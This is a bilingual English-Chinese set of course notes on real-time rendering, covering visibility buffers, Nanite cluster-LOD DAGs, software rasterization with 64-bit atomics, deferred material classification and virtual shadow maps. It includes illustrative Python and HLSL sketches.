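    def pack_visibility(alpha_masked: bool, draw_id: int, primitive_id: int) -> int:
        assert draw_id < (1 << DRAW_BITS) and primitive_id < (1 << PRIM_BITS)
        return (int(alpha_masked) << (DRAW_BITS + PRIM_BITS)) | (draw_id << PRIM_BITS) | primitive_id

    def unpack_visibility(packed: int):
        alpha_masked = (packed >> (DRAW_BITS + PRIM_BITS)) & 1
        draw_id = (packed >> PRIM_BITS) & ((1 << DRAW_BITS) - 1)
        primitive_id = packed & ((1 << PRIM_BITS) - 1)
        return bool(alpha_masked), draw_id, primitive_id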

    webp

    Visibility Buffer - Shading

    可见性缓冲区-着色

    • For each pixel in screen-space we do:

      对于屏幕空间中的每个像素,我们做:

    • Get drawID/triangleID at pixel pos

      在像素位置获取 drawID/triangleID

    • Load data for the 3 vertices from the VB

      从 VB 加载 3 个顶点的数据

    • Compute triangle gradients

      计算三角形梯度

    • Interpolate vertex attributes at pixel pos using gradients

      使用渐变在像素位置插值顶点属性

      • Attribs use w from position to compute perspective correct interpolation

        属性使用 w 从位置计算透视校正插值

      • The MVP matrix is applied to the position

        将 MVP 矩阵应用到位置上

    • We have all data ready: shade and calculate final color

      我们已经准备好所有数据:阴影和计算最终颜色

    Pipeline of Visibility Buffer

    可见性缓冲管道

    webp

    Visibility Buffer + Deferred Shading

    可见性缓冲区+延迟着色

    webp

    Correct Texture Mipmap with Gradient (With vs. Without)

    用梯度校正纹理 Mipmap(有无对比)

    webp

    Results

    Total

    • 8 Million Triangles
    • 5 Million Vertices

    webp

    Visibility Buffer

    | GPU AMD RADEON R9 380 | 1080p | 1440p | 2160p |
    | --------------------- | ----- | ----- | ----- |
    | No MSAA               | 8.57  | 10.72 | 15.19 |
    | No MSAA – No Culling  | 14.52 | 15.86 | 20.45 |
    | 2x MSAA               | 11.44 | 16.38 | 25.87 |
    | 4x MSAA               | 15.27 | 20.82 | 37.86 |

    Deferred Shading

    | GPU AMD RADEON R9 380 | 1080p | 1440p | 2160p |
    | --------------------- | ----- | ----- | ----- |
    | No MSAA               | 9.75  | 12.30 | 20.19 |
    | No MSAA – No Culling  | 14.16 | 16.6  | 24.06 |
    | 2x MSAA               | 16.16 | 23.09 | 42.68 |
    | 4x MSAA               | 24.90 | 36.37 | 69.64 |

    Virtual Geometry - Nanite

    虚拟几何-Nanite

    Challenges of Realistic Rendering

    webp

    Nanite Overview

    Nanite 概述

    • Overview

      概述

    • Geometry Representation

      几何表示法

      • Cluster-based LoD

        基于集群的 LoD

      • BVH and runtime LoD

        BVH 和运行时间 LoD

    • Rendering

      渲染图

      • Software and Hardware Rasterization

        软件和硬件光栅化

      • Visibility Buffer

        可见性缓冲区

      • Deferred Materials

        延迟材质(Deferred Materials)

      • Tile-based Acceleration

        基于屏幕分块(tile)的加速

    • Virtual Shadow Map

      虚拟阴影贴图

    • Streaming and Compression

      流媒体和压缩

    Virtual Texture

    虚拟纹理

    • Build a virtual indexed texture to represent all blended terrain materials for whole scene

      构建一个虚拟索引纹理,以表示整个场景的所有混合地形材质

    • Only load the material data of tiles based on view-dependent LOD

      仅根据视相关的 LOD 加载各 tile 的材质数据

    • Pre-bake blended materials into tiles and store them in physical textures

      将材质混合预烘焙到 tile 中,并存入物理纹理

    webp

    The Dream

    理想

    • Virtualize geometry like we did textures

      像纹理一样虚拟化几何体

      • No more budgets

        没有更多预算

        • Poly count

          多边形计数

        • Draw calls

          绘制调用

        • Memory

          内存

    • Directly use film quality source art

      直接使用电影质量的源艺术

      • No manual optimization required

        无需手动优化

    • No loss in quality

      质量无损失

    Reality

    现实

    • MUCH harder than virtual texturing

      比虚拟纹理难得多

      • Not just memory management

        不仅仅是内存管理

      • Geometry detail directly impacts rendering cost

        几何体细节直接影响渲染成本

      • Geometry is not trivially filterable (SDF, Voxels, Point Clouds)

        几何体不能轻易过滤(SDF、体素、点云)

    Voxels?

    体素?

    • Spatially uniform data distribution

      空间均匀的数据分布

    • Big memory consumption

      内存消耗大

    • Attribute leaking

      属性泄漏

    webp

    • Not interested in completely changing all CG workflow

      对完全改变所有 CG 工作流程不感兴趣

      • Support importing meshes authored anywhere

        支持导入在任何地方编写的网格

      • Still have UVs and tiling detail maps

        仍然有 UV 和平铺细节贴图

      • Only replacing meshes, not textures, not materials, not tools

        仅替换网格,不替换纹理,不替换材质,不替换工具

    • Never ending list of hard problems

      永无止境的难题清单

    Subdivision Surfaces?

    细分曲面?

    • Subdivision by definition is amplification only

      根据定义,细分只是放大

    • Great for up close, but it never gets simpler than the base mesh

      近处效果很好,但永远不会比基础网格更简单

    • Sometimes produces an excessive number of triangles

      有时会产生过多的三角形

    webp

    Maps-based Method?

    基于贴图的方法?

    • Works well for organic surfaces that already are uniformly sampled

      适用于已经均匀取样的有机表面

    • Difficult to control hard-surface features

      难以控制硬表面特征

    • Sometimes object surface is not connected

      有时物体表面不连接

    webp

    Point Cloud?

    点云?

    • Massive amounts of overdraw

      大量的过度绘制(overdraw)

    • Requires hole filling

      需要补孔

    webp

    https://highperformancegraphics.org/slides22/Software_Rasterization_of_2_Billion_Points_in_Real_Time.pptx

    webp

    Foundation of Computer Graphics

    计算机图形学基础

    • The most elemental, atomic unit of surface area in 3D space

      三维空间中最基本的原子表面积单位

    • Every surface can be turned into triangles

      每个曲面都可以变成三角形

    webp

    Nanite Geometry Representation

    Nanite 几何表示法

    Screen Pixels and Triangles

    屏幕像素和三角形

    • Linear scaling in the number of instances can be OK

      实例数量的线性增长尚可接受

    • Linear scaling in the number of triangles is not OK

      三角形数量的线性增长不可接受

    Why should we draw more triangles than screen pixels?

    为什么我们应该绘制比屏幕像素更多的三角形?

    webp

    Represent Geometry by Clusters

    按簇表示几何体

    webp

    View Dependent LOD Transitions – Better than AC Solutions

    视图相关 LOD 转换——优于 AC 解决方案

    webp

    Similar Visual Appearance with 1/30 Rendering Cost!

    相似的视觉效果,渲染成本仅为 1/30!

    webp

    Naïve Solution - Cluster LoD Hierarchy

    幼稚的解决方案-集群 LoD 层次结构

    • Decide LOD on a cluster basis

      基于集群确定 LOD

    • Build a hierarchy of LODs

      构建 LOD 层次结构

      • Simplest is tree of clusters

        最简单的是集群树

      • Parents are the simplified versions of their children

        父节点是其子节点的简化版本

    webp

    Naïve Solution - Decide Cluster LOD at Run-time

    朴素的解决方案:在运行时决定簇的 LOD

    • Find a cut of the tree for the desired LOD

      为所需的 LOD 找到树的一个切割(cut)

    • View dependent based on perceptual difference

      基于感知差异的视图依赖

    webp

    Naïve Solution – Simple Streaming Idea

    天真的解决方案——简单的流媒体创意

    • Entire tree doesn’t need to be in memory at once

      整个树不需要一次出现在内存中

    • Can mark any cut of the tree as leaves and toss the rest

      可以把树的任意切割标记为叶节点,并丢弃其余部分

    • Request data on demand during rendering

      渲染过程中按需请求数据

      • Like virtual texturing

        类似于虚拟纹理

    webp

    But, How to Handle LOD Cracks

    但是,如何处理 LOD 裂缝

    • If each cluster decides its LOD independently of its neighbors: cracks!

      如果每个簇独立于邻居决定自己的 LOD,就会出现裂缝!

    • Naive solution:

      天真的解决方案:

      • Lock shared boundary edges during simplification

        在简化过程中锁定共享边界边

      • Independent clusters will always match at boundaries

        独立集群将始终在边界处匹配

    webp

    Locked Boundaries? Bad Results

    锁定边界?糟糕的结果

    • Collects dense cruft

      积累稠密的冗余几何

    • Especially between deep subtrees

      尤其是在深子树之间

    webp

    webp

    Nanite Solution - Cluster Group

    Nanite 解决方案:簇组(Cluster Group)

    • Can detect these cases during build

      可以在构建过程中检测到这些情况

    • Group clusters

      将簇分组

    • Force them to make the same LOD decision

      迫使他们做出相同的 LOD 决定

    • Now free to unlock shared edges and collapse them

      现在可以自由解锁共享边并折叠它们

    webp

    Build Operations

    构建操作

    • Pick and group these 4 adjacent clusters

      选出这 4 个相邻的簇并分组

    • Merge and Simplify the clusters to half the number of triangles

      将簇合并并简化为三角形数量的一半

    • Split simplified triangle list back into 2 new clusters

      将简化的三角形列表拆分回 2 个新集群

    • We have now reduced 4 clusters of 4 triangles each to 2 clusters of 4 triangles each

      我们现在已经把 4 个各含 4 个三角形的簇缩减为 2 个各含 4 个三角形的簇

    webp

    • Cluster original triangles

      对原始三角形进行聚类

    • While NumClusters > 1

      当 NumClusters > 1 时

      • Group clusters to clean their shared boundary

        将集群分组以清理其共享边界

      • Merge triangles from group into shared list

        将组中的三角形合并到共享列表中

      • Simplify to 50% the number of triangles

        将三角形的数量简化到 50%

      • Split simplified triangle list into clusters (128 tris)

        将简化的三角形列表拆分为簇(128 个 tris)
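
    Putting the loop above into pseudocode (a sketch: split_into_clusters, group_by_shared_boundary, merge_triangles and simplify are hypothetical stand-ins for real mesh-processing routines):

    # Cluster-DAG build loop, 128 triangles per cluster as in Nanite.
    def build_dag(triangles, cluster_size=128):
        clusters = split_into_clusters(triangles, cluster_size)  # LOD 0
        levels = [clusters]
        while len(clusters) > 1:
            next_level = []
            for group in group_by_shared_boundary(clusters):     # clean shared edges
                merged = merge_triangles(group)                  # union of the group's triangles
                simplified = simplify(merged, target=len(merged) // 2)  # 50% triangles
                children = split_into_clusters(simplified, cluster_size)
                for c in children:
                    c.source_group = group                       # DAG links, not a tree
                next_level.extend(children)
            clusters = next_level
            levels.append(clusters)
        return levels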

    Build Clusters

    构建集群

    webp

    Simplification on Cluster Group

    集群组的简化

    webp

    webp

    Alternate Group Boundaries between Levels

    级别之间的备用组边界

    • The key idea is to alternate group boundaries from level to level by grouping different clusters.

      关键思想是通过对不同集群进行分组,在不同级别之间交替设置组边界。

    • A boundary in one level becomes the interior in the next level

      一层中的边界成为下一层的内部

    • Locked one level, unlocked the next

      锁定一个级别,解锁下一个级别

    webp

    Cluster group boundaries for LoD0

    LoD0 的集群组边界

    Cluster group boundaries for LoD1

    LoD1 的集群组边界

    Cluster group boundaries for LoD2

    LoD2 的集群组边界

    DAG for Cluster Groups

    集群组的 DAG

    • Merge and split makes this a DAG instead of a tree

      合并和拆分使其成为 DAG 而不是树

      • This is a good thing in that you can’t draw a line from LOD0 all the way to the root without crossing an edge

        这是一件好事,因为你不能在不穿过边的情况下从 LOD0 一直画到根部

      • Meaning there can’t be locked edges that stay locked and collect cruft

        这意味着不可能有锁定的边缘保持锁定并收集碎屑

    webp

    Why DAG, not Tree (Trap!)

    为什么是 DAG,而不是树(陷阱!)

    Jungle of clusters, group and their links

    集群、群体及其联系的丛林

    webp

    Let’s Chop the Lovely Bunny

    webp

    Detail of Simplification - QEM

    简化细节-QEM

    webp

    webp

    Runtime LoD Selection

    运行时 LoD 选择

    View-Dependent LoD Selection on DAG?

    DAG 上的视图相关 LoD 选择?

    Group is faster than cluster, but DAG is still very complicated

    组比簇快,但 DAG 仍然非常复杂

    webp

    LOD Selection for Cluster Group

    聚类组的 LOD 选择

    • Two submeshes with the same boundary, but different LOD

      具有相同边界但 LOD 不同的两个子网格

    • Choose between them based on screen-space error

      根据屏幕空间错误在它们之间进行选择

      • Error calculated by the simplifier, projected to screen

        由简化器计算的误差,再投影到屏幕上

      • Corrected for distance and angle distortion at worst-case point in sphere bounds

        针对球体边界中最坏情况点的距离和角度失真进行了校正

    • All clusters in group must make same LOD decision

      组中的所有集群都必须做出相同的 LOD 决策

      • How? Communicate? No!

        怎么办?沟通?不!

      • Same input => same output

        相同的输入 => 相同的输出

    webp

    LOD Selection in Parallel

    并行 LOD 选择

    • LOD selection corresponds to cutting the DAG

      LOD 选择对应于切割 DAG

      • How to compute in parallel?

        如何并行计算?

      • Don’t want to traverse the DAG at run-time

        不想在运行时遍历 DAG

    • What defines the cut?

      切割的定义是什么?

      • Difference between parent and child

        父母和孩子的区别

    • Draw a cluster when:

      在以下情况下绘制集群:

      • Parent error is too high && our error is small enough

        父节点误差太高 && 自身误差足够小

      • Can be evaluated in parallel!

        可以并行评估!

    webp

    • Only if there is one unique cut

      前提是切割是唯一的

      • Force the error to be monotonic

        强制误差单调

    • Parent view error >= child view error

      父视图错误 >= 子视图错误

    • Careful implementation to make sure runtime correction is also monotonic

      仔细实施以确保运行时校正也是单调的

    webp

    Core Equation of Parallel LoD Selection for Cluster Groups

    集群并行 LoD 选择的核心方程

    • When can we LOD cull a cluster?

      我们什么时候可以 LOD 剔除集群?

      • Render: ParentError > threshold && ClusterError <= threshold

        渲染:ParentError > 阈值 && ClusterError <= 阈值

      • Cull: ParentError <= threshold || ClusterError > threshold

        剔除:ParentError <= 阈值 || ClusterError > 阈值

    • Parent is already precise enough. No need to check the child

      父节点已经足够精确,无需再检查子节点

      • ParentError <= threshold

        父错误 <= 阈值

      • Tree based on ParentError, not ClusterError!

        树基于 ParentError,而不是 ClusterError!

    Isolated LoD Selection for Each Cluster Group

    每个集群组的独立 LoD 选择

    • Render: ParentError > threshold && ClusterError <= threshold
    • Cull: ParentError <= threshold || ClusterError > threshold
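
    Since the build forces ParentError >= ClusterError (monotonic), every cluster can evaluate this test in isolation, which makes the selection trivially parallel; a minimal sketch:

    # Per-cluster LOD test. Same input => same output, so all clusters in a group
    # agree without communicating, and the selected set is exactly one cut of the DAG.
    def select_clusters(clusters, threshold):
        return [c for c in clusters
                if c.parent_error > threshold and c.cluster_error <= threshold]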

    webp

    BVH Acceleration for LoD Selection

    用于 LoD 选择的 BVH 加速

    Really Bad Explanation of Why and How about BVH

    关于 BVH 的“为什么”与“怎么做”的粗略解释

    • BVH4

      • Max of children's ParentError

        取各子节点 ParentError 的最大值

      • Internal node: 4 children nodes

        内部节点:4 个子节点

      • Leaf node: List of clusters in group

        叶子节点:组中的簇列表

    Build BVH for Acceleration of LoD Selection

    构建 BVH 以加速 LoD 选择

    • 7,000,000 triangles will create 110,000 clusters

      7000000 个三角形将创建 110000 个簇

    • Iterating all cluster/cluster groups is too slow

      迭代所有集群/集群组太慢

    • Let’s build BVH for each LoD cluster groups

      让我们为每个 LoD 集群组构建 BVH

    webp

    Balance BVH for 4 Nodes

    平衡 4 个节点的 BVH

    webp

    Detail of BVH Acceleration

    BVH 加速的细节

    • total 110,437 clusters,

      总共 110437 个簇,

    • check bvh node = 107, check cluster = 4240,

      检查 bvh 节点 = 107、检查簇 = 4240

    • select cluster = 2175

      选择群集 = 2175

    webp

    Hierarchical Culling - Naive Approach

    分层剔除-朴素方法

    • Dependent DispatchIndirects

      相互依赖的 DispatchIndirect

      • One per level

        每层一个

    • Global synchronization

      全局同步

      • Wait for idle between every level

        在每个级别之间等待空闲

    • Worst case # of levels

      最坏情况下的级别数量

      • Empty dispatches at the end

        末尾为空调度

    • Can be mitigated by higher fanout

      可以通过更高的扇出来缓解

      • Wasteful for small/distant objects

        对小/远距离物体浪费

    webp

    Persistent Threads

    持久线程

    • Ideally

      理想情况下

      • Start on a child as soon as its parent has finished

        父节点一完成就立即开始处理其子节点

      • Spawn child threads directly from compute

        直接从计算中生成子线程

    • Persistent threads model instead

      改为持久线程模型

      • Can’t spawn new threads. Reuse them instead!

        无法生成新线程。重复使用它们!

      • Manage our own job queue

        管理我们自己的作业队列

      • Single dispatch with enough worker threads to fill GPU

        单分派,具有足够的工作线程来填充 GPU

      • Use simple multi-producer multi-consumer (MPMC) job-queue to communicate between threads

        使用简单的多生产者多消费者(MPMC)作业队列在线程之间进行通信

    webp

    Nanite Rasterization

    Nanite 光栅化

    Pixel Scale Detail

    像素比例细节

    • Can we hit pixel scale detail with triangles > 1 pixel?

      我们可以用大于 1 像素的三角形来达到像素级的细节吗?

    • Depends how smooth

      取决于平滑程度

    • In general no

      一般来说,没有

    • Need to draw pixel sized triangles

      需要绘制像素大小的三角形

    webp

    Hardware Rasterization

    硬件光栅化

    • HW Rasterization unit is quad (2x2 pixels) for ddx and ddy

      对于 ddx 和 ddy,HW 光栅化单元为四边形(2x2 像素)

    • Need help pixels (yellow) to form quads

      需要帮助像素(黄色)来形成四边形

    webp

    • Use 4x4 tiled traversal to accelerate

      使用 4x4 平铺遍历来加速

    webp

    • A lot of waste for small triangles

      对小三角形浪费严重

    • The tiled traversal stage is useless

      分块遍历阶段毫无用处

    • Quads generate 4x more pixels than are really covered

      四边形(quad)产生的像素数可达实际覆盖像素的 4 倍

    webp

    Software Rasterization for Tiny Triangles

    微小三角形的软件光栅化

    • Terrible for typical rasterizer

      对于典型的光栅化器来说很糟糕

    • Typical rasterizer:

      典型光栅化器:

      • Macro tile binning

        宏块分箱(macro tile binning)

      • Micro tile 4x4

        微型瓷砖 4x4

      • Output 2x2 pixel quads

        输出 2x2 像素四边形

      • Highly parallel in pixels, not triangles

        在像素维度高度并行,而不是三角形维度

    • Modern GPUs set up at most 4 tris/clock

      现代 GPU 每时钟最多设置 4 个三角形

      • Outputting SV_PrimitiveID makes it even worse

        输出 SV_PrimitiveID 会使情况变得更糟

    • Can we beat the HW rasterizer in SW?

      我们能在软件中击败硬件光栅化器吗?

    3x faster!

    webp

    Nanite – Rasterization

    Nanite-光栅化

    • Only rasterize 1 pixel in the shader when the triangle is smaller than 1 pixel

      当三角形小于 1 像素时,在着色器中只光栅化 1 个像素

    • This saves the compute for 3 of a quad's 4 pixels when the triangle covers only 1 pixel

      如果三角形只覆盖 1 个像素,就能省下四边形中另外 3 个像素的计算资源

    • Reconstruct derivatives for ddx/ddy

      重建 ddx/ddy 的导数

    webp

    Scanline Software Rasterizer

    扫描线软件光栅化器

    • Per-cluster based rasterization selection

      基于每个集群的光栅化选择

      • Clusters whose edges are all < 18 pixels are SW rasterized

        所有边都小于 18 像素的簇走软件光栅化

    • Iterating over the bounding rect tests a lot of pixels

      遍历包围矩形会测试大量像素

    • Best case, half of them are covered

      最好的情况下也只有一半被覆盖

    • Worst case, none are

      最坏的情况是一个都没有

    • Scanline method is a choice

      扫描线方法是一种选择
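
    A minimal scanline sketch of the idea: walk each row between the left and right edge crossings instead of testing every pixel of the bounding rect (illustrative CPU code, no depth or attribute handling):

    def rasterize_scanline(v0, v1, v2, emit):
        # Each v is an (x, y) pair in pixel coordinates; sort by y.
        v0, v1, v2 = sorted((v0, v1, v2), key=lambda v: v[1])

        def x_at(a, b, y):  # x of edge a-b at scanline y
            if b[1] == a[1]:
                return a[0]  # degenerate/horizontal edge guard
            t = (y - a[1]) / (b[1] - a[1])
            return a[0] + t * (b[0] - a[0])

        for y in range(int(v0[1]), int(v2[1])):
            # Long edge v0-v2 on one side; v0-v1 or v1-v2 on the other.
            xa = x_at(v0, v2, y + 0.5)
            xb = x_at(v0, v1, y + 0.5) if y + 0.5 < v1[1] else x_at(v1, v2, y + 0.5)
            for x in range(int(min(xa, xb)), int(max(xa, xb))):
                emit(x, y)  # depth test / attribute interpolation would go here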

    webp

    How To Do Depth Test?

    如何进行深度测试?

    • Don’t have ROP or depth test hardware

      没有 ROP 或深度测试硬件

    • Need Z-buffering

      需要 Z-缓冲

      • Can’t serialize at tiles

        无法在图块上序列化

      • Many tris may be in parallel for single tile or even single pixel

        对于单个图块甚至单个像素,许多 tris 可能是并行的

    • Use 64 bit atomics!

      使用 64 位原子!

    | Bits      | 32          | 25                                | 7                          |
    | --------- | ----------- | --------------------------------- | -------------------------- |
    | Field(字段) | Depth(深度) | Visible cluster index(可见簇索引) | Triangle index(三角形索引) |

    • InterlockedMax

      原子最大值(InterlockedMax)

      • Visibility buffer shows its true power

        可见性缓冲显示其真正的力量

    Nanite Visibility Buffer

    Nanite 可见性缓冲区

    | NumberBits | 32          | 25                                | 7                          |
    | ---------- | ----------- | --------------------------------- | -------------------------- |
    | Type(类型) | Depth(深度) | Visible cluster index(可见簇索引) | Triangle index(三角形索引) |
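
    A minimal sketch of this packing, assuming the 32/25/7 bit split above. Because depth sits in the most significant bits, a single atomic max performs the depth test and the visibility write at once:

    import struct

    def pack_visbuffer(depth_f32: float, cluster: int, triangle: int) -> int:
        # Reinterpret the float depth as its 32-bit pattern (order-preserving for depths >= 0).
        depth_bits = struct.unpack("<I", struct.pack("<f", depth_f32))[0]
        assert cluster < (1 << 25) and triangle < (1 << 7)
        return (depth_bits << 32) | (cluster << 7) | triangle

    def atomic_max(buffer, pixel, value):
        # Stand-in for HLSL InterlockedMax on a 64-bit UAV.
        buffer[pixel] = max(buffer[pixel], value)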

    webp

    • Write geometry data to screen

      将几何数据写入屏幕

      • Depth : InstanceID : TriangleID

        深度:实例 ID:三角形 ID

    • Material shader per pixel:

      每像素材质着色器:

      • Load VisBuffer

        加载 VisBuffer

      • Load instance transform

        加载实例转换

      • Load 3 vertex indices

        加载 3 个顶点索引

      • Load 3 positions

        加载 3 个位置

      • Transform positions to screen

        将位置转换到屏幕

      • Derive barycentric coordinates for pixel

        推导像素的重心坐标

      • Load and lerp attributes

        加载和 lerp 属性

    • Sounds crazy? Not as slow as it seems

      听起来很疯狂?没有看起来那么慢

      • Lots of cache hits

        大量缓存命中

      • No overdraw or pixel quad inefficiencies

        没有过度绘制或像素四边形效率低下

    • Material pass writes the GBuffer

      材质 pass 写入 GBuffer

      • Integrates with rest of our deferred shading renderer

        与我们的其他延迟着色渲染器集成

    • Draw all opaque geometry with 1 draw

      用 1 次绘制绘制所有不透明几何体

      • Completely GPU driven

        完全由 GPU 驱动

      • Not just a depth prepass

        不仅仅是深度预通道(depth prepass)

      • Rasterize triangles once per view

        每个视图对三角形进行一次栅格化

    Hardware Rasterization

    硬件光栅化

    • What about big triangles?

      大三角形呢?

    • Use HW rasterizer

      使用硬件光栅化器

    • Choose SW or HW per cluster

      为每个集群选择软件或硬件

    • Also uses 64-bit atomic writes to a UAV

      也使用 64 位原子写入 UAV(无序访问视图)

    webp

    Imposters for Tiny Instances

    用于微小实例的替身(imposter)

    • 12 x 12 view directions in atlas

      图集中 12 x 12 个视图方向

      • XY atlas location octahedral mapped to view direction

        XY 图集位置八面体映射到视图方向

      • Dithered direction quantization

        抖动的方向量化

    • 12 x 12 pixels per direction

      每个方向 12 x 12 像素

      • Orthogonal projection

        正交投影

      • Minimal extents fit to mesh AABB

        最小范围贴合网格 AABB

      • 8:8 Depth, TriangleID

        8:8 深度,三角形 ID

      • 40.5KB per mesh always resident

        每个网格始终驻留 40.5KB

    • Ray march to adjust parallax between directions

      光线行进以调整方向之间的视差

      • Few steps needed due to small parallax

        由于视差小,需要很少的步骤

    • Drawn directly from the instance culling pass

      在实例剔除阶段直接绘制

      • Bypassing visible instances list

        绕过可见实例列表

    • Would like to replace with something better

      想换个更好的

    webp

    Rasterizer Overdraw

    光栅化的过度绘制(overdraw)

    • No per triangle culling

      无每个三角形的剔除

    • No hardware HiZ culling pixels

      无硬件 HiZ 剔除像素

    • Our software HZB is from previous frame

      我们的软件 HZB 来自上一帧

      • Culls clusters not pixels

        剔除聚类而非像素

      • Resolution based on cluster screen size

        基于集群屏幕大小的分辨率

    • Excessive overdraw from:

      过度绘制来自:

      • Large clusters

        大型集群

      • Overlapping clusters

        重叠集群

      • Aggregates

        聚合体(aggregates)

      • Fast motion

        快速运动

    • Overdraw expense

      过度绘制的代价

      • Small tris: vertex transform and triangle setup bound

        小三角形:受顶点变换和三角形设置(setup)限制

      • Medium tris: pixel coverage test bound

        中等三角形:受像素覆盖测试限制

      • Large tris: atomic bound

        大三角形:受原子操作限制

    webp

    Nanite Deferred Material

    Nanite 延迟材质

    Deferred Material

    延迟材质

    • Nanite wants to support fully artist-created pixel shaders

      Nanite 希望支持完全由美术创建的像素着色器

    • In theory, all materials could be applied in a single pass, but there are complexities and inefficiencies there

      理论上,所有材质都可以在单个 pass 中完成,但这样做既复杂又低效

    webp

    Material Shading

    材质着色

    • Common method

      常用方法

      • Draw a full screen quad per unique material

        为每种独特材质绘制全屏四边形

      • Skip pixels not matching this material

        跳过与此材质不匹配的像素

    • Disadvantages

      缺点

      • The CPU is unaware if some materials have no visible pixels (an unfortunate side effect of being GPU driven)

        CPU 不知道某些材质是否没有任何可见像素(GPU 驱动带来的不幸副作用)

      • So unnecessary draw commands will be committed

        因此会提交不必要的绘制命令

    Shading Efficiency

    着色效率

    • Hardware depth test!

      硬件深度测试!

      • Convert material ID to depth value

        将材质 ID 转换为深度值

    webp

    Shading

    着色

    • Then draw a full-screen quad with the depth-test function set to “equal”, so unmatched pixels are discarded

      然后绘制一个全屏四边形,并将深度测试函数设为“相等”,这样不匹配的像素会被丢弃

    • But a full-screen quad is not necessary, and this can be improved!

      但全屏四边形并不是必需的,还可以改进!
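
    A minimal sketch of the trick (the slot-to-depth mapping below is an assumption for illustration; any injective mapping works as long as both passes use the same one):

    MAX_MATERIAL_SLOTS = 1 << 14  # e.g. the 14-bit material slot seen in the code later

    def material_to_depth(slot: int) -> float:
        # Spread material slots over (0, 1]; the material-depth texture must be
        # written with this same function.
        return (slot + 1) / MAX_MATERIAL_SLOTS

    def shade_material(slot, material_depth_buffer, shade_pixel):
        z = material_to_depth(slot)
        for pixel, depth in material_depth_buffer.items():  # full-screen "quad"
            if depth == z:                                  # hardware EQUAL depth test
                shade_pixel(pixel, slot)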

    Material Sorting with Tile-Based Rendering

    基于平铺渲染的材质排序

    • We can do a screen-tile material classification

      我们可以对屏幕分块(tile)做材质分类

    • For a certain material, exclude the tiles that do not contain this material

      对于某种材质,排除不包含该材质的 tile

    webp

    Material Classify

    材质分类

    webp

    Material Classify - Material Tile Remap Table

    材质分类:材质 tile 重映射表

    • Finally forms a material-to-tile remap table

      最终形成一张材质与 tile 的重映射表

    • Get the number of tiles from the screen resolution and pack 32 tiles into a group

      根据屏幕分辨率得到 tile 数量,并把 32 个 tile 打包成一组

    • ‘MaterialRemapCount’ means the number of groups

      “MaterialRemapCount” 指组的数量

    • Record the tiles in which a material appears by marking them bit by bit

      通过按位标记来记录每种材质出现在哪些 tile 中

    • This table can be used to calculate the tile positions to render to

      这张表可用于计算要渲染到的 tile 位置
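
    A minimal sketch of such a remap table (all names here are illustrative):

    # One bit per tile, 32 tiles per uint32 group.
    def build_remap_table(num_materials, tiles_per_screen, materials_of_tile):
        groups = (tiles_per_screen + 31) // 32          # "MaterialRemapCount"
        table = [[0] * groups for _ in range(num_materials)]
        for tile in range(tiles_per_screen):
            for mat in materials_of_tile(tile):          # materials present in this tile
                table[mat][tile // 32] |= 1 << (tile % 32)
        return table

    def tiles_of_material(table, mat):
        # Iterate only the tiles whose bit is set; these are the quads to draw.
        for g, bits in enumerate(table[mat]):
            while bits:
                low = bits & -bits                       # lowest set bit
                yield g * 32 + low.bit_length() - 1
                bits ^= low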

    webp

    Deferred Material Overall Process

    延迟材质的整体流程

    • Generate material resolve texture

      生成材质解析纹理

    • Generate material depth texture

      生成材质深度纹理

    • Classify screen-tile materials

      对屏幕 tile 的材质进行分类

    • Generate G-Buffer

      生成 G-缓冲区

      • This will be output to the g-buffer to match with the rest of the pipeline

        这将被输出到 g-buffer,以与管道的其余部分相匹配

      • Commit draw commands per material

        按材质提交绘制命令

    webp

    void UnpackMaterialResolve(
        uint Packed,
        out bool IsNanitePixel,
        out bool IsDecalReceiver,
        out uint MaterialSlot)
    {
        IsNanitePixel   = BitFieldExtractU32(Packed, 1, 0)  != 0;
        MaterialSlot    = BitFieldExtractU32(Packed, 14, 1);
        IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0;
    }

    Shadows

    阴影

    Micropoly Level Detail for Shadows

    阴影的微多边形级细节

    webp

    Nanite Shadows - Ray Trace?

    Nanite 阴影-射线追踪?

    • Ray trace?

      射线追踪?

    • There are more shadow rays than primary since there are on average more than 1 light per pixel

      由于每个像素平均有 1 个以上的光,因此阴影光线比主光线多

    • Custom triangle encoding

      自定义三角形编码

    • No partial BVH updates

      无部分 BVH 更新

    • HW triangle formats + BLAS (bottom level acceleration structure) currently are 3-7x the size of Nanite data

      HW 三角形格式 + BLAS(底层加速结构)目前是 Nanite 数据大小的 3-7x

    webp

    RTX 40XX,50XX? Radeon RX 70XX…?

    Recap Cascaded Shadow Map

    回顾级联阴影图

    • Relatively coarse LOD control

      LOD 控制相对粗糙

    • If better shadow detail is desired, there is still significant memory consumption

      如果需要更好的阴影细节,仍然会消耗大量内存

    webp

    Sample Distribution Shadow Maps

    样本分布阴影贴图(SDSM)

    • Gives a better cascaded map coverage by analysing the range of screen pixel depths

      通过分析屏幕像素深度范围,提供更好的级联地图覆盖率

    • An optimized cascaded shadow map but still has coarse LOD control

      优化的级联阴影贴图,但仍具有粗略的 LOD 控制

    webp

    webp

    Virtual Shadow Map - A Cached Shadow System!

    虚拟阴影贴图:一个带缓存的阴影系统!

    • Most lights don’t move, should be cached as much as possible

      大多数灯光不会移动,应尽可能缓存

    webp

    Virtual Shadow Maps

    虚拟阴影贴图

    • 16k x 16k virtual shadow map for each light (exception, point light with 6 VSMs)

      每个灯光的 16k x 16k 虚拟阴影贴图(具有 6 个 VSM 的点光源除外)

    webp

    Different Light Type Shadow Maps

    不同的灯光类型阴影贴图

    webp

    Shadow Page Allocation

    影子页面分配

    • Only visible shadow pixels need to be cached

      只需要缓存可见的阴影像素

      • For each pixel on screen

        对于屏幕上的每个像素

      • For all lights affecting this pixel

        对于影响此像素的所有灯光

      • Project the position into shadow map space

        将位置投影到阴影贴图空间

      • Pick the mip level where 1 texel matches the size of 1 screen pixel

        选择 1 个纹素与 1 个屏幕像素大小相当的 mip 级别

      • Mark the page as needed

        根据需要标记页面

      • Allocate physical page space for uncached pages

        为未缓存的页面分配物理页面空间
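
    A minimal sketch of the page-marking loop (the projection helper, page size and light interface are hypothetical):

    PAGE_SIZE = 128  # texels per page side; an assumed value for illustration

    def mark_needed_pages(screen_pixels, lights, project_to_shadow_space):
        needed = set()
        for pixel in screen_pixels:
            for light in lights:
                if not light.affects(pixel):
                    continue
                uv, texels_per_pixel = project_to_shadow_space(light, pixel)
                # Pick the mip where one shadow texel ~ one screen pixel.
                mip = max(0, round(texels_per_pixel).bit_length() - 1)
                page = (light.id, mip, int(uv[0]) // PAGE_SIZE, int(uv[1]) // PAGE_SIZE)
                needed.add(page)
        return needed  # physical space is then allocated only for uncached pages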

